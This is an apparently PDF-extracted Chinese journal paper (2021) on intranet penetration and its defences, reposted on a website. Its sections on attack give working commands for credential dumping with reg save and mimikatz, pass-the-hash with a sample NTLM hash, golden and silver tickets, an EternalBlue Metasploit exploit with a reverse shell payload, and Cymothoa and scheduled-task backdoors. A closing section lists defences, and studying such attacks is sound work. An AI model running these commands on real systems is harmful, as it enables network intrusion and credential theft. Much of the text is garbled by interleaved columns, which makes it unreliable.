admin 管理员组文章数量: 1184232
2024年3月13日发(作者:linux系统怎么关闭防火墙)
第
38
卷
第
3
期
吉
林
化工学
院学报
Vol.38
No.3
Mar.
20212021
年
3
月
JOURNAL
OF
JILIN
INSTITUTE
OF
CHEMICAL
TECHNOLOGY
文章编号
:
1007-2853
(
2021
)
03-0070-08
简析内网渗透过程及防御措施
徐
过
I
,
2
,
李双远
1
*
*
(
1.
吉林化工学院信息中心
,
吉林吉林
132022
;
2•
吉林化工学院信息与控制工程学院
,
吉林吉林
132022
)
摘要
:
随着信息化建设的发展与局域网的普及
,
企业局域网的各种核心数据及客户信息都存放在企业
的数据库中
,
其中包括企业的核心生产技术
、
生产数据和企业内部信息等
,
由此可以看岀企业的网络安
全相当重要.主要论述内网渗透过程及相关的防御措施,以此给企业网络管理人员提岀相关建议.
关键词
:
内网渗透
;
信息收集
;
横向渗透
;
跨域攻击
;
暴力破解
中图分类号
:
TP
393.1
文献标志码
:
A
DOI
:
10.16039/22-1249.2021.03.015
随着局域网
(
Local
Area
Network
丄
AN
)
的应
用与普及
,
越来越多的企业都已建设自己的内部
础上
,
攻击者通过控制该内部主机在企业内网中
进行渗透的过程及相关防御措施
.
网络
(
局域网
)
,
内部网络是企业内部设备之间数
据传输的重要通道
•
企业局域网的建设
,
不仅提高
了员工的工作效率
,
还在一定程度上提高了企业
1
内网信息收集
在内网渗透过程中
,
信息收集尤为重要
•
攻击
数据的安全性
•
但是
,
大多数企业只注重对企业外
部网络威胁的防御
,
忽略了来自企业内部的入侵
防御
•
攻击者就会利用企业内网环境的这一弱点
,
者可以通过信息收集获取内部网络的更多信息
,
比如系统的防火墙防护情况或主机端口开放情况
先通过一些方法取得企业内部某台设备的控制
权
,
再控制内部设备对公司内部网络进行全面渗
等等
•
掌握系统的信息后
,
可以对系统服务进行针
对式入侵
•
信息收集的工作量非常大
,
整个渗透过
程中
,
信息收集所花费的时间和精力是最多的
•
信
息收集这一过程
,
其实就是为接下来的渗透工作
透
•
影响企业网络安全的因素有很多
,
就员工层面
来讲
,
员工浏览不良网站或点击钓鱼链接等行为
造成电脑感染病毒
,
都将会使企业内网中的主机
成为攻击者攻击企业内部网络的工具
•
而就企业
做准备
,
收集到的信息越多
,
渗透就会越容易
,
越
轻松
•
网络管理者来讲
,
如果管理者的安全防范意识不
1.1
本机信息收集
本机信息收集的内容主要包括查询本机所在
内网中的位置和角色
、
内网中存活主机发现
、
主机
够强
,
泄露了企业服务器或企业内部主机的登录
密码等私密信息
,
这些都将给企业网络安全带来
很大的安全隐患
•
企业内部的一台设备沦陷
,
就可
能会造成企业的整个系统崩溃
,
最后给企业带来
系统识别
、
开放端口探测以及防火墙配置情况
等等.
1.1.1
查询本机系统信息
无以估量的损失
•
由此可见
,
企业内网的安全管理
是多么的重要
•
企业不仅需要重视外部网络的防
御
,
也更应注重企业内部网络的安全防御
•
本文主
了解本机系统信息和补丁安装情况极其重
要
,
通过了解一台主机系统的基本信息
,
可以大概
猜测出内网中其他主机的系统信息和补丁情况
,
要论述在攻击者获取内网中某台主机控制权的基
收稿日期
:
2020-11-17
基金项目
:
吉林省职业技术教育学会科研课题
(
2020XHY195
)
作者简介
:
徐过
(1999-)
,
男
,
四川泸州人
,
吉林化工学院
2018
级学生
,
主要从事计算机网络安全方面的研究
.
*
通信作者:
李双远
(1982-
)
,
男
,
吉林双辽人
,
吉林化工学院高级实验师
,硕士,
主要从事网络缓存
、
物联网
、
边缘计
算
、智慧校园、
网络安全
,
互联网应用技术与创新创业教育方面的研究
:
lsy@
第
3
期
徐过
,
等
:
简析内网渗透过程及防御措施
71
如果主机系统存在漏洞
,
而他刚好又没及时安装
相应补丁
,
那么就可以利用该漏洞进行渗透
•
如果
查看共享资料
:
Net
view
主机是
Windows
系统
,
那么在命令窗口输入
“
systeminfo
”
命令就可以查询系统的配置信息
,
包
查看
arp
表
:
Arp-a
括系统型号
、
系统版本以及补丁情况等.
1.1.2
查询当前用户角色
查看
hosts
文件
:
Type
C
:
windows
system32
drivers
etc
hosts
系统对用户的权限进行了严格的划分
,
权限
查看
dns
缓存
:
ipconfig
/
displaydns
越高
,
能进行的操作就越多
.Windows
系统中
,
权
限最高的是
TrustedInstaller
,
权限最低的是
Guest
用户
,
Administrator
是系统管理员
,
User
为普通用
户
•
而
Linux
系统中权限最高的是
Root
(
超级管理
员用户
)
.
在命令窗口输入
“
whoami
”
就可以查询当前
用户所拥有的权限
.
1.1.3
查询本机信息
查询本机服务信息
:
wmic
service
list
brief
查看防火墙配置
:
Netsh
firewall
show
config
查询当前登录域
:
net
config
workstation
快速定位域控
ip
:
net
time
/
domain
查看域控制器
:
net
group
“
domaincontrollers
”
/
domain
1.2存活主机探测及端口扫描
内网存活主机探测的目的是找到内网中其他
存活主机的地址
,
一般一个
IP
对应一台主机
•
端
口扫描是渗透前的基本准备工作
,
攻击者的攻击
利用对象基本都是目标主机开放的服务
.
1.2.1
存活主机探测
探测内网存活主机的方法很多
,
可以使用脚
本来实现存活主机的探测
,
还可以通过一些工具
来探测内网存活主机
,
常用的工具有
Nmap
、
Nbtscan
、
Superscan
、
Arp-scan
等
.
比如执行下列命
令
,
就可使用
nmap
工具探测
192.168.0
网段中的
主机
:
Nmap-sN
192.168.0.0/24
除了用工具发现存活主机以外
,
还可以通过
查看
DNS
、
ARP
表
、
hosts
文件等方式发现内网中
存活的一些主机
.
1.2.2
网络端口扫描
端口是主机各服务运行的主要依赖对象
,
攻
击者可以通过扫描目标主机开放的端口获取目标
主机开放的网络服务程序情况
[
1
]
,
因为一个网络
服务程序对应一个端口
.
TCP
和
UDP
协议的端口
号在
0
—
65535
之间
•
一般情况下
,
1024
以内的端
口号对应常用的网络服务
•
例如
:
21
号端口对应
FTP
服务
,22
号端口对应
SSH
服务
,
3389
号端口
对应远程桌面连接服务等
•
可以使用
nmap
工具进
行端口扫描
[
2
]
:
Nmap-A
192.168.1.101/24
2
权限提升
当发现控制的机器不能进行敏感操作或读取
不到重要文件时
,
那么就会考虑提升用户权限
,
也
称为提权
.
2.1
利用内核溢出漏洞提权
利用系统内核溢出漏洞提权是常用的提权方
法
,
但如果系统被及时打上漏洞补丁
,
那么该提权
方式将行不通
.
2.1.1
查找系统缺失补丁
执行
“
Systeminfo
”
命令
,
就可通过查询系统文
件里的补丁号来查询机器上安装的补丁情况
.
2.1.2
利用未修复漏洞提权
如果目标主机系统没有对已知漏洞进行修
补
,
攻击者就可以通过该漏洞进行权限提升
•
比如
ms14-068
漏
洞
,
该
漏
洞
对
应
的
补
丁
号
为
KB3011780•
该漏洞的成因和
Kerberos
协议认证过
程有关
,
Kerberos
是一种计算机网络授权协议
.
Kerberos
协议认证过程如图
1
所示
[
3-4
]
•
大致认证流程如下
:
72
吉
林
化
工
学
院
学
报
2021
年
(1)
域用户登录时
,
向
KDC
进行预认证
;
(2)
AS
验证密码是否正确
,
如果验证通过
,
制
,
程序在操作启动前会对用户身份进行验证
.
程
序需要
UAC
的授权才能进行某些操作
,
比如访问
则返回给用户一张
TGT
票据
;
(3)
用户拿着
TGT
向
KDC
的
TGS
服务申请
系统根目录
,
对重要配置文件进行读取等
.
利用
UAC
提权的原理是发现高权限运行但是没有
UAC
提示的应用
,
再找到其启动调用时所缺失的
访问
Application
Server
的票据
;
(4)
域控的
TGS
服务验证
TGT
通过后
,
返回
值
,
然后添加对应的值完成提权
.
2.2.1
给域用户能够访问
Application
Server
的票据
,
Bypassuac
模块提权
即
ST
;
(5)
域用户拿着
ST
访问对应的
Application
假设已经获得目标机器的
meterpreter
shell
,
且当前用户在管理员组中
,
那接下来使用
Server;
(
6)
Application
Server
验证
ST.
客户机
图
1
Kerberos
协议认证过程图
下面简述
ms14-068
的问题为
:
TGT
作为用户凭证
,
包含了用户名
、
用户
id
、
所属组等信息
,
即
PAC.
简单点讲
,PAC
就是验证
用户所拥有权限的特权属性证书
.
默认
PAC
是包含在
TGT
中
,
而出现
ms14-
068
这个问题的原因在于用户在申请
TGT
时可以
要求
KDC
返回的
TGT
不包含
PAC
(
include-PAC
为
false)
,
然后用户自己构造
PAC
并放入
TGS_
REQ
数据包中的
REQ
_
BODY
中
.KDC
会解密
PAC
并加密到一个新的
TGT
中
(
正常应该返回一
个
ST)
并返回给用户
,
此时这个
TGT
已经带入了
构造的恶意的
PAC.
利用方法
:
python
ms14-068.
py-u
<
userName
>
@
<
domainName
>-s
<
userSid
>-d
<
domainControlerAddr
〉
"
kerberos
:
:
ptc
TGT_user@
”
exit
2.2
绕过
UAC
提权
UAC
(
User
Account
Control
)
指用户
账户控
Bypassuac
模块将用户权限提升为
System
权限
.
在
meterpreter
命令窗口执行以下命令
:
Exploit/windows/local/bypassuac
(
将返回一一
个新的
shell)
,
接着执行
"getsystem
”
命令将用户
权限提升为
system
权限
.
2.2.2
RunAs
模块提权
利用
RunAs
模块提权的过程和利用
Bypassuac
模块提权过程相似
.
运行
exploit/windows/local/ask
模块时
,
会生
成一个可执行文件
,
如果目标运行程序
,
程序会请
求提升权限
,
如果用户选择继续运行
,
那么就会成
功获得一个更高的权限
.
2.3
Token
窃取
Token
即令牌
,
是描述进程或者线程安全上
下文的对象
,
类似于账号和密码
.
但是
Token
只是
临时密钥
,
有效时间有限
.
当用户登录时
,
如果登
录验证信息正确
,
系统将生成相应的访问
Token,
之后用户的进程都将携带该
Token.
如果利用工具
复制管理员
Token
后
,
再去创建新的进程
,
那么该
进程就拥有管理员的权限
.
3
域内横向渗透
域内横向渗透在攻击者攻击内网系统中很常
见
,
以已经取得控制权的主机为跳板
,
攻击其他域
内的主机
.
攻击者通过跳板机一步一步接近域控
制器
,
最终达到控制域控制器的目的
.
3.1
密码抓取
密码抓取在渗透中极其重要
,
如果一个管理
员管理
N
台机器
,
这
N
台机器的密码可能都一样
或者有相同的特征
.
如果攻击者知道其中一台机
器上的密码
,
就可以使用该密码进行碰撞攻击或
第
3
期
徐过
,
等
:
简析内网渗透过程及防御措施
73
者通过分析密码组成特征
,
利用密码组成特征分
议的登录验证
•
例如执行以下命令使用工具
hydra
暴力破解
ip
为
192.168.1.101
的机器的远程桌面
析出其他主机的密码
•
通过此方法获取其他主机
控制权相比其他方法要容易很多
.
3.1.1
抓取本地用户凭据
协议
,
其中的
rdp
是远程桌面协议
:
Hydra
192.
168.
1.
101
rdp-L
user.
txt-P
password
.txt-V
[5-7]
Windows
系统中
的密码由
LM
hash
和
NTLM
hash
两部分组成
•
用户名和密码等信息都保存在
3.2
远程连接
SAM
文件中
.SAM
文件的目录为
C
:
windows
当拿到目标主机用户密码或
NTLM
Hash
后
.
可以通过凭据传递的方法
,
将散列值或密码传送
到目标机器中进行验证
,
与目标主机建立连接
.
system32config,
该目录存放着用户的密码
,
攻击
者使用以下
REG
命令就可以抓取其中的密码
hash
值
:
reg
save
hklm
sam
reg
save
hklm
system
reg
save
hklm
security
微软公司发布补丁
KB2871997,
关闭了
Wdigest
功能
,
从而防止用户密码以明文形式泄
露
•
但用户可以将注册表下处值改为
0
来禁用
.
HKEY
_
LOCAL
_
MACHINE
SYSTEM
CurrentControlSet
Control
SecurityProviders
WDigest
UseLogonCredential
3.1.2
域
hash
当拿到域控权限后
,
就可以利用工具拷贝出
C
:
中的用户
hash
,
然后
再使用如
NTDSDumpEx
等工具解析
hash.
3.1.3
弱口令暴破
弱口令是最容易被利用的漏洞
,
攻击者通常
会使用弱口令爆破常用的默认端口
,
比如
ssh
连
接
22
端口
,
远程桌面
3389
端口
,
还有
Mysql
数据
库
3306
端口等
•
如果管理者设置了弱口令或者密
码强度不够
,
那么攻击者通过密码暴力破解就可
以轻轻松松获取主机控制权限
•
当攻击者不知道用户名和密码的时候
,
攻击
者就会尝试对主机的账号和密码进行暴力破解
,
其原理就是利用字典文件中的账号和密码去尝试
连接
,
当字典里的账号和密码和正确的账号和密
码匹配上时
,
就会返回正确结果
•
暴力破解主要分为以下
3
种情况
:
(1)
知道登录用户名但不知道登录密码
;
(2)
知道登录密码但不知道登录用户名
;
(3)
不知道用户名和密码
•
暴力破解的工具有很多
,
常用的有
hydra
、
lasercrack
、
medusa
等
,
爆破工具可以爆破多种协
3.2.1
IPC
IPC(Inter
Process
Connection
)
是为了
实现进
程间通信而开放的命名管道
.IPC
—
般通过验证
用户名和密码获取相应的权限
•
通过
ipc$,
可以访
问目标主机上的文件
•
不仅如此
,
还可以利用他在
目标机器上运行命令
.
执行以下命令
,
与
ip
为
192.168.1.101
的目标
主机建立
ipc$
连接
:
Net
use
192.
16
8.1.
101
ipc
$
“
password
”
/
user
:
username
⑻
Net
use(
查看当前连接
)
3.2.2
dir
和
tasklist
命令
Dir
命令
:
与目标主机建立连接后
,
使用
dir
命令查看目标主机中的文件
.
Tasklist
命令
:
同理
,
与目标主机建立连接后
,
可以使用此命令查看目标主机上运行的进程
.
3.3
哈希传递攻击
哈希攻击
,
是指攻击者拿到登录信息的散列
值之后
,
不进行解密
,
直接传递登录信息的散列值
到目标主机进行验证
,
可以不对散列值进行
破解⑼.
哈希传递攻击方式
:
如果域中含有大量计算机
,
那么管理员设置
的密码可能都一样
,
从而登录信息的散列值也一
样⑼•当攻击者得到从某台主机上获取的相应的
散列值
,
再使用第三方工具直接传递到其他目标
主机上进行身份验证
,
实现对目标主机的控制
.
假设目标主机信息为
:
Ip
:192.16
8.1.101
域名
:
用户名
:
username
NTLM
Hash
:
d93a5def7511da3d0f2d171d9c344e91
74
吉林化工学院学报
2021
年
运行
mimikatz,
执行以下命令
,
将实现对目标
Exploit
(
开始执行
)
主机的哈希传递攻击
:
Mimikatz
u
privilege
:
:
debug
”
“
sekurlsa
::
执行上述命令主要用于检测存在永恒之蓝漏
洞的目标主机
,
接下来执行以下命令对存在该漏
洞的目标主机进行攻击
:
Use
pth
/
user
:
username
/
domain
:
test.
com
/
ntlm
:
d93a5def7511da3d0f2d171d9c344e91
”
exploit/windows/smb/msl7
_
010
3.4
票据传递攻击
_eternalblue
票据传递
(
Pass
The
Ticket
,PTT
)
攻击不同于
哈希传递攻击
,
哈希传递攻击需要管理员权限
,
而
之后可以输入命令
show
options
查看设置参
数
,
使用命令对
ip
为
193.168.1.101
的主机进行
攻击
:
票据传递攻击传递不需要
.
如果没获得管理员权
限
,
票据传递攻击要比哈希传递攻击容易
•
可以同样使用
mimikatz
工具进行票据传递
攻击
:
第
1
步
,
导出内存中的票据
:
Mimikatz
“
privilege
:
:
debug
”
“
sekurlsa
:
:
tickets
/
export
”
第
1
步完成后
,
目录中会新增几个票据文件
;
第
2
步
,
清除内存中的票据
:
Mimikatz
#
kerberos
:
:
purge
第
3
步
,
注入票据文件
:
Mimikatz"
kerberos
:
:
ptt
“
C
:
ticket
[
0;
4f7cf
]
-2-0-60a00000-username
@
krbtgt-TEST.
”
3.5
永恒之蓝漏洞攻击
2017
年
5
月
,
名为
“
WannaCry
”
的勒索软件轰
动了整个网络安全界
,
影响了全球近百个国家上
千企业及公共组织
•
而与之有关的便是同年
4
月
份被曝出来的
“
永恒之蓝
”
(
MS17-010
)
漏洞
•
永恒
之蓝漏洞被曝出来时
,
威胁着全球
70%
的
windows
服务器的安全
,
该漏洞在互联网中引起
轩然大波
.
永恒之蓝漏洞利用的是在
Windows
系统中默
认开启的
SMB
服务
,
对应的端口号默认为
445
端
口
•
该漏洞的原理是通过向
Windows
服务器中的
SMBv1
服务发送构造的指令造成溢出
,
最终导致
任意命令的执行
.
现在新版的
Metasploit
都包含了
永恒之蓝漏
洞的利用模块
•
执行以下命令可以利用
metasploit
中的模块检测该漏洞
:
Auxiliary/
scanner/
smb/
smb_ms17_010
Set
rhosts
ip
地址段
(
设置扫描
ip
地址范围
)
Set
threads
40
(
设置线程数
,
默认为
1
)
Set
rhost
192.168.1.101
接下来设置攻击
payload,
目标主机的操作系
统不一样
,
设置的
payload
也不一样
,
这里需要选
择对应的
playload
:
Set
payload
windows/x64/meterprete"reverse
_tcp
Exploit
(
执行攻击指令
)
攻击成功后就会返回
一个
meterpreter
shell,
通过该
shell
就可以控制目标主机了
.
4
跨域攻击
一般大型企业都有自己的内网
,
为了方便管
理
,
根据职责的不同或功能不同
,
将域划分为主域
和子域
•
如果攻击者得到某个子域的控制权
,
那么
就会通过子域想方设法取得主域的控制权
•
4.1
域信任
域信任是为了不同域之间能更好地进行资源
共享
•
域信任是域中的一种机制
,
如果
A
信任
B,
那么当
B
中的用户在通过
A
的验证后
,
就可以访
问
A
中的资源
•
域信任分为单向信任和双向信任
两种
•
简单来说
,
单向信任就是
A
信任
B,
但
B
不
一定信任
A
;
而双向信任是
A
信任
B,
那
B
也信任
A.
如果是内部信任
,
那么域信任还可以传递
•
如果
A
信任
B,B
信任
C,
那么
A
也信任
C,
这就是信任
传递
[9]
.
子父域之间默认是双向信任
,
攻击者可以借
此利用子域攻击父域
•
可以通过
sidhistory
跨域
提权
.
利用以下命令
,
使用
mimikatz
工具获取子域
的
krbtgt
hash
Lsadump
:
:
lsa
/
patch
第
3
期
徐
过
,
等
:
简析内网渗透过程及防御措施
75
再输入
"powerview
”
命令获取父域
sid
Get-DomainComputer-Domain
断编写更高级的后门
•
为了逃过杀毒软件的
”
追
杀
”
,
后门程序的种类变得多种多样
,
本文只介绍
最后添加一个企业管理员
,
获取父域管理
常见的几种
.
(1)
注册表注入后门
权限
.
执行以下命令
,
有引号的位置表示是需要根
据实际信息输入的参数
:
kerberos
:
:
golden
/
user
:'
指定的用户
'
/
攻击者可以通过修改注册表
,
将后门程序路
径添加到注册表中启动并运行后门程序
•
修改的
注册表路径为
:
HKCU
:
Software
Microsoft
Windows
CurrentV
ersion
Run
krbtgt
:'
krbtgt
hash
'
/
domain
:
'
当前用户名
'
/
sid
:'
当前域的
SID
'
/sids
:'
目标域的
SID
'
/ptt
4.2
攻击
Kerberos
Kerberos
是域中的核心协议
,
上文介绍过
Kerberos
的工作流程
,
这里不做累述
•
当获取到
krbtgt
hash
时
,
可以通过伪造票据进行验证
.
4.2.1
金票据
金票据是伪造
Kerberos
协议中的
TGT,
Kerberos
协议验证过程中的
TGT
是由
krbtgt
加密
而成
•
所以如果获取到
krbtgt
hash
,
就可以构造任
意的
TGT
了
.
攻击方法
:
Mimikatz
kerberos
:
:
purge
kerberos
:
:
golden
/
admin
:
administrator
/
domain
:域
/
sid
:
SID
/krbtgt
:
krbtgt
hash
值
/ticket
:
administrator.
kiribi
kerberos
:
:
ptt
administrator.
kiribi
kerberos
:
:
tgt
dir
$
4.2.2
银票据
金票据是伪造
TGT
,
而银票据伪造的是
TGS,
原理和金票据相似
.
攻击方法
:
mimikatz.
exe
"
kerberos
:
:
golden
/
domain
:
域
/sid
:
SID
/
target
:
域控全
称/
service
:要访问的
服务
,
如
cifs
/
rc4
:
NTLM
,
计算机账号
hash
/
user
:
user
/ptt"
dir
serverc
$
5
权限维持
当攻击者获取目标主机控制权后
,
为了不会
因为入侵时与目标主机建立的连接通道被管理人
员或杀毒软件关闭而失去控制权限
,
攻击者就会
在目标主机上留下其他更隐蔽的后门
[10]
.
随着防御软件功能的升级
,
操作系统后门也
一直不断升级
•
为了让控制权限更持久
,
攻击者不
当管理员登录系统时
,
后门程序会自动运行
.
(2)
计划任务后门
计划任务是指系统按照预设的任务指令执行
任务
,
而计划任务后门
,
也是如此
,
可以设置后门
程序的运行时间
•
计划任务的任务类别会因用户
权限的不同而不同
,
管理员权限下的用户可以设
置更多的计划任务
•
将后门程序的运行时间进行
修改
,
可以降低被目标主机发现的风险
•
计划运行后门的命令如下
,
假如将后门程序
每
1
h
运行
1
次
.
Schtasks
/
Create
/
tn
Updater
/
tr
/
sc
hourly
/
mo
1
(3)
Cymothoa
后门
Cymothoa
是一个可以将
Shellcode
注入进程
的工具
.Cymothoa
后门是很常见的后门
,
他是以其
他进程为宿主
,
不需要建立新的进程
•
通过插入其
他操作系统信任的进程来躲避杀毒软件的扫描
,
如果安全防护工具不检测内存
,
就发现不了
.
使用
Cymothoa
植入后门时
,
需要先找到正在
运行的进程
,
再将后门程序插入到指定的
PID
进
程中去
•
把后门程序发送到目标主机上后
,
可以直
接执行以下命令将后门程序插入到指定的进程
中去
:
Cymothoa-p
101-s
2-y
4444
其中
-p
参数指定进程
PID,-s
指定
shellcode
类别
,
-
y
指定后门服务端口
.
之后攻击者在客户端执行下列命令就可以与
目标主机建立连接
:
Nc-nvv
192.168.1.101
4444
6
防范措施
6.1
信息收集防范措施
内网信息收集依赖的主要对象是主机开启的
76
吉
林
化
工
学
院
学
报
2021
年
端口
,
所以针对内网信息收集的防范措施主要为
以下
3
点
:
(1)
关闭不用的端口
,
尽量减少不必要端口
任关系;
(2)
域之间建立连接时应进行多重身份
验证
;
(3)
不同域之间使用不同密码
.
的开启
;
(2)
增强防火墙的管理策略
,
拦截异常的
6.5
后门种植防范措施
流量
;
(3)
建立安全防护系统
,
对有异常行为的主
攻击者通过种植新的后门来达到持久性控制
目标主机
,
所以只要发现并清理攻击者留下的后
门
,
就可以使攻击者失去控制权•当发现未知的软
机进行通信阻断
.
6.2
权限提升防范措施
件或文件时
,
要及时清除
,
并且切记将残留文件清
攻击者进行提权方法一般是通过利用系统修
补的漏洞提权
,
系统不安全的权限分配提权和利
用
Token
提权
•
相应的防范措施有以下
6
点
:
(1)
及时给服务器打补丁
,
做好备份
,
才能有
效保障网站安全
,
避免黑客攻击
[
11
]
;
(2)
普通用户或程序给予普通权限
,
不要轻
易将管理员权限分配给用户
;
(3)
不要运行未知安全的软件
,
也不要下载
或传播来路不明的文件
;
(4)
缩短
Token
的有效时长
;
(5)
增强
Token
的验证方法以及安全管理
;
(6)
将密码放在只有管理员权限才能访问的
文件中
.
6.3
针对横向渗透的防范措施
攻击者进行横向渗透的核心是密码
,
所以主
要的防范策略也是以密码安全管理为中心
•
而攻
击者进行横向渗透使用最多的方法是密码暴力破
解和密码碰撞
,
所以
,
企业网络运维人员可以通过
以下
5
个方法进行防范
:
(1)
不选择常用的邮箱以及手机号作为密
码
,
密码最好不要进行反复的使用
,
通常情况多使
用不固定的邮箱进行手机业务的交互
[
12
]
;
(
2)
针对
Kerberoast
攻击
,
确保密码长度超过
25
位
;
(3)
对
Kerberos
票据使用
AES256_HMAC
加密
;
(4)
及时更新病毒库
.
6.4
跨域攻击防御措施
域控制器安全是域安全的核心
,
跨域攻击时
,
攻击者的目标是域控制器的控制权
•
做到以下几
点可以防范跨域攻击
:
(1)
域安全管理时
,
应严格分配域之间的信
理干净•主要的防范措施是以下几点
:
(1)
定期升级安全防护软件
,
及时更新病
毒库
;
(2)
定期检查系统中的进程
,
及时清理异常
进程
;
(3)
定期检查主机开放端口是否发生变化
;
(4)
定期查看后台计划任务
,
发现异常
,
及时
处理
;
(5)
养成良好的桌面使用习惯
.
7
结
论
本文简述内网渗透过程以及防御措施
,
介绍
攻击者从进入内网到拿下域控制器权限的过程以
及对应的防御措施•阐述了漏洞利用的原理
,
研究
攻击者一步一步实现入侵的攻击方式以及防范措
施.研究发现因为管理者不当的管理方法造成主
机沦陷的问题很多
,
比如使用弱密码
、
多次使用同
一密码及未及时安装系统漏洞补丁等•综上所述,
为保证内网下的主机安全
,
网络安全管理员应该
有良好的安全防范意识
,
避免使用弱密码同时也
应防止密码有被泄露的风险•而不安全的配置会
让攻击者有可乘之机
,
用户权限和域信任应制定
严格标准
,
尽量减少高权限的给予和域之间访问.
为有效保证系统安全,
需及时安装系统补丁和升
级安全防护软件
,
当然
,
员工和管理者拥有良好的
上网行为也极为重要.
参考文献
:
[
1
]
孙海舟
,
韩晓龙
.
基于等级保护的主机安全防护研
究
[
J
]
.
警察技术
,2014(S1)
:
127-130.
第
3
期
徐过
,
等
:
简析内网渗透过程及防御措施
77
[2]
王小妹
,
陈红松
.
网络安全与管理实验教程
[M].
北
[8]
陈学平
,
李明
.计算机网络安全与应用
[
M].
北京
:
化
京
:
清华大学岀版社
,2015.
[3]
学工业岀版社,2012.
[9]
徐扬
,
苑津莎
,
高会生
,
等
.
基于伪
ID
的
RFID
认证
王江涛
,
陈志刚
,
邓晓衡
.
普适计算中一种上下文感
协议及串空间证明[J].
计算机科学
,
2017
(10)
:
142-146,176.
[4]
知的自适应可信模型
[J].
通信学报
,
2012(11)
:
41-48,56.
郭帆
.
网络攻防技术与实战深入理解信息安全防护
[10]
武新华
,
王英英
,
李伟
.
网络渗透技术攻防高手修炼
[M].
体系
[M].
北京
:
清华大学岀版社
,2018,9.
[5]
北京:
电子工业岀版社
,2011.
[11]
李双远
,
王偶师
,
才海龙
,
等
.
从
SQL
注入到服务器
吕秋云
,
王小军
,
胡耿然
,
等
.
网络空间安全技术实
践教程
[M].
西安:
西安电子科技大学岀版社
,2017.
沦陷全过程剖析
[J].
吉林化工学院学报
,2010,27
(4)
:
48-51.
[
12
]
李双远
,
谈国胜
.
面向
Web
的攻击方式及防御对策
[J].
[6]
陈小兵
.
完全之路
WEB
渗透技术及实战案例解析
[M].
2
版
,
北京
:
电子工业岀版社
,2015.
[7]
陈小兵
,
刘晨
,
黄小波
.
黑客攻防实战加密与解密
[
M].
北京
:
电子工业岀版社
,2016.
吉林化工学院学报
,2019,36(3)
:
47-53.
Brief
Analysis
of
Internal
Network
Penetration
Process
and
Defense
Measures
XU
Guo
1,2
,LI
Shuangyuan
1
*
(
1
.
Information
Service
Center,
Jilin
Institute
of
Chemical
Technology,
Jilin
132022,
China;
2.
School
of
Information
and
Control
Engineering,Jilin
Institute
of
Chemical
Technology,Jilin
132022,China)
Abstract
:
With
the
development
of
information
construction
and
the
popularization
of
LAN
,
most
of
the
core
data
and
customer
information
of
enterprises
are
stored
in
the
database
of
enterprises,
including
the
core
production
technology,production
data
and
enterprise
internal
information,etc.,from
which
it
can
be
seen
that
the
network
security
of
enterprises
is
how
important.
This
paper
mainly
discusses
the
process
of
internal
network
penetration
and
relevant
defense
measures,so
as
to
give
relevant
Suggestions
to
enterprise
network
managers.
Key
words
:
Network
infiltration;information
collection;transverse
penetration;cross-domain-attack;brute
force
版权声明:本文标题:简析内网渗透过程及防御措施 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/b/1710264392a565086.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论